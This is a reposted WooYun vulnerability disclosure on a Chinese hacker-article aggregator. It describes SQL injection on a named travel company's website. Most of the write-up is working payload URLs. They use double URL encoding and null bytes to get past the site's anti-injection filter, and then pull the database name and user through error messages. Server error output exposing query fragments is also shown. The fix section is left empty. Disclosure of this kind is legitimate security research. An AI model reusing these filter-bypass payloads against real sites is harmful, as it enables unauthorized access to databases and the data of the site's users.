记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

苏州同程旅游某站点SQL注入及绕过

2015-03-24 05:20

WooYun: 苏州同程六合一系统任意密码查看

http://www.tycts.com/LineList.aspx?title=2015

code 区域
http://www.tycts.com/LineList.aspx?title=2015%27

您提交的数据中存在非法的字符,请删除后再提交

非 法 字 符:'

提 交 参 数:title

提 交 方 式:Query

操 作 页 面:/LineList.aspx

操 作 I P :

操 作 时 间:2015-2-6 11:23:19

提 交 数 据:2015'



0x1

code 区域
http://www.tycts.com/LineList.aspx?title=2015%2527

'2015' 附近有语法错误。 字符串 ' AND G.MemberId = 2019021 AND G.IfCheck=3 and G.IfDel =0 Select SCOPE_IDENTITY()' 后的引号不完整。



貌似双重url编码就绕过了?

但是:

0x2

code 区域
http://www.tycts.com/LineList.aspx?title=2015%27 %2561nd

防注入程序提示您,请勿提交非法字符



0x3

code 区域
http://www.tycts.com/LineList.aspx?title=2015%2527%00%2561nd

空格使用%00替换

' AND G.AllowWebDirect = 1 AND G.MaxStartDate >= ' 附近有语法错误(mssql+aspx理论上是00-0a都可以,这里0a,09过滤了,%00-%08可行)



0x4

code 区域
http://www.tycts.com/LineList.aspx?title=2014%2527%2520%2561nd%00%2564b_name%28%29%253e0%00%252d%252d%2520 db_name

http://www.tycts.com/LineList.aspx?title=2014%2527%2520%2561nd%00%2575ser%253e0%00%252d%252d%2520 user

漏洞证明:

00002.JPG

00003.JPG

修复方案:


知识来源: www.wooyun.org/bugs/wooyun-2015-095982

阅读:182944 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“苏州同程旅游某站点SQL注入及绕过”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

标签云 ☁